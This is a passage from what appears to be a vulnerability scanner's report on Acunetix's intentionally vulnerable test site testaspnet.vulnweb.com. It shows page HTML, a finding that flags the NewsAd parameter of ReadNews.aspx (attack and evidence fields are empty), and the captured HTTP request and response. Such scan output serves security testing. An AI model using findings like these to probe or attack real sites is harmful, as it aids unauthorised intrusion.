alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html
Method	GET
Parameter	NewsAd
Attack
Evidence
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:46 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 